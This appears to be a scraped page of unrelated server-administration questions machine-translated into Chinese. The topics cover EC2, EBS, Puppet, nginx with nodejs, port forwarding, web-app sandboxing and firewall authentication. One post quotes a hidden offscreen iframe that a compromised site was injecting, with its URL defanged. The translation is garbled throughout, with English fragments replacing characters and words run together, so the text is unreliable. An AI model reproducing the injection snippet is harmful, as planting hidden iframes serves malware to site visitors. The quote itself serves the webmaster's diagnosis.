在EC2实例(Xen虚拟化)中,可以通过主机VM禁用客户VM的时间同步。 我发现它可以通过修改xen.independent_wallclock = 1在Linux实例上完成 有没有类似的方式来做到这一点的Windows?
这是一个数据库(Postgre)虚拟机,其数据存储在一个单独的EBS卷上。 我可以这样做,以便相同的EBS卷自动挂载(这是假设没有其他实例正在使用该EBS)。 这样做的原因是数据库启动时会有数据文件可用。
我是Puppet的新手,我试图让Puppet在从AWS中的Cloud Formation Template启动后configurationEC2实例。 问题是,所有从云形成模板开始的节点都具有相同的名称(新节点派生自AMI的名称)。 我很想find一个方法来让节点启动时傀儡重命名节点。 (虽然,据我所知,计算机名称更改需要重新启动,一个单独的问题…) 如果你能指出我的一些文件,可以帮助我解决这个问题,或者如果你有任何想法,将是伟大的。 我的最终目标是让每个EC2都以唯一的名称开始,以便我可以使用New Relic服务器监视来报告不同的服务器。 我最终需要为Linux和Windows Server 2008 R2实现这一点,但是我想我已经弄清楚了Linux的一面。 更新: 我和New Relic谈了这个问题,他们证实New Relic目前没有办法用机器名称以外的东西来报告。 所以从New Relic方面来解决这个问题并不是一个好的select。 我也想避免在创build机器后不得不更改机器名称,因为我不想在机器启动后重新启动机器。 我的理想select是使Cloud Formation能够从AMI生成新的EC2实例,但在创build过程中使用特定的计算机名称(例如将计算机名称设置为实例Id或其他名称)。
我想在Ubintu服务器12.4上安装nodejs和nginx,并设置它们以进行可靠的工作。 你能否提供以下问题的答案: 我应该在哪里安装nodejs? 我应该在哪里findnodejs项目文件以及我需要设置的权限? 我应该如何设置nginx作为nodejs的代理?
编辑:进一步的信息/调查信息包含在这篇文章的评论 对这个模糊的标题表示歉意 – 总结这个问题有困难。 我最近发现,我的网站之一,在恶意软件的服务。 作为这个的结果,我已经grepped在httpdocs下的每个文件,并寻找任何可疑的东西,即调用shell_exec,eval,base64,passthru,包括,要求,cookiefunction在PHP文件。 我也经历了所有的JS文件寻找可疑的方法,另外,因为该网站的方面是从一个数据库build立我已经搜查了任何可疑的东西(使用phpmyadmin数据库searchfunction来寻找PHPshell等典型的JS恶意软件命令) 所有没有用,我根本找不到这是哪里。 因此,我已经重新加载了所运行的软件的所有文件,并有效地重新安装了站点文件。 我也有提供的软件经过检查,他们也没有find任何东西。 这让我得出的结论是,更高级别的东西,即Apache已经被攻破。 所以问题是我应该在这里检查? 我正在运行一个专门的服务器,只服务于这个网站,只有我有权访问(他说),所以我能够运行任何需要帮助诊断 恶意软件如何呈现? 间歇地将以下代码放入我的标签中: <style> .iqb71l { position:absolute; left:-1958px; top:-1826px} </style> <div class="iqb71l"><iframe src="hXXp://1.1.1.1/f72387bd1dfab35f89f1899e1be07c08/q.php" width="198" height="501"></iframe></div> 注意:在上面的代码示例中,我已将“http”更改为“hXXp”,将IP地址更改为“1.1.1.1” 但是,代码并不总是被注入,似乎是随机添加的。 另外,当代码确实出现时,IP地址跟在GUID和类名之后通常是不同的。 此外,没有任何恶意软件扫描仪(即谷歌网站pipe理员工具等等)正在采取这一点。 所以我猜测,这不仅仅是一个基本的注入,它是随机select何时呈现自己,它是dynamicselect一个地址注入,它似乎是恶意软件扫描器referrers隐形。 花了很多时间谷歌这一点,我一直没有find任何类似的情况下,但我已经find了很多网站pipe理员询问有关出现在他们的服务器上的一个不可思议的q.php文件引用。
也许我没有正确地解决我的问题,但我有一个IP地址和多个服务器在IP路由器后面。 有没有办法让我redirect请求从服务器获得HTTP转发到防火墙后面的其他计算机? 我在用着: Ubuntu – 所有服务器 Apache2 – 所有服务器 IpFire – 路由器软件
我想沙箱托pipe在同一台服务器上的多个Web应用程序。 为了testing我的场景,我在本地机器上configuration了一台Apache Web服务器,并在这台机器上托pipe了Web应用程序。 其中一个Web应用程序易受攻击,我想在自己的shell中包含易受攻击的Web应用程序,并且不会干扰同一服务器上托pipe的其他Web应用程序。 我怎样才能达到这个选项,即像apparmor,selinux或chroot这样的强制访问控制策略。 这是一个好的做法,目前的做法是什么?
我需要通过互联网暴露一个不可靠的内部networking应用程序,无法修改,使内在更安全。 这个问题最常见的解决scheme是通过VPN访问networking应用程序。 不幸的是,在我的情况下这是不可能的,所以我正在争取另一个解决scheme。 在某些时候,我遇到过使用防火墙的问题,可以在用户通过Web表单进行身份validation之后dynamic地打开端口。 表单位于防火墙设备提供的网站上,在幕后,防火墙正在使用通过表单提供的凭据对Active Directory进行身份validation。 validation通过后,防火墙在有限的时间内打开了一些源于Web表单连接的IP端口。 我想在我的情况下使用这样的事情,因为它会为我的Web应用程序提供足够的安全性。 不幸的是我不知道这个技术。 堆栈来寻找或这种防火墙authentication的老实姓名。 有人能告诉我需要看哪些技术? 谢谢,波格丹
我试图find一种方法将shell命令传递给Linux EC2实例。 基本上我有一个创buildEBS卷的脚本,启动一个CloudFormation堆栈,然后将新卷附加到堆栈中的EC2实例。 我想要做的是把这个音量作为脚本的一部分进行格式化和安装,但是我似乎在这一点上遇到了障碍。 我的python不是很棒,但我已经设法通过了大部分的这一点,同时学习一堆。 我考虑使用Paramiko,但是我需要通过几个服务器隧道到达实例的子网。 # Attach an EBS volume to the EC2 Server instance def attach_ebs(stack_id, results_volume): resources = cfn.list_stack_resources(stack_id) for r in resources: if r.resource_type == "AWS::EC2::Instance" and "Server" in r.logical_resource_id: ec2.attach_volume(results_volume, r.physical_resource_id, "/dev/sdh")
我试图在运行Ubuntu 12.04的机器上部署Web服务(wsdl),并通过外部networking(即Internet)访问它。 起初,我使用apache2进行testing,通过启动它并通过http://<ip-adress>/访问一个简单的网站。 它工作正常 其次,我停止了apache2并开始我的服务运行在端口80上。我的服务可以通过http://localhost/本地访问,但是无法访问使用http://<ip-address> 我想知道是否我错过了一些东西或包含外部function,允许外部访问服务。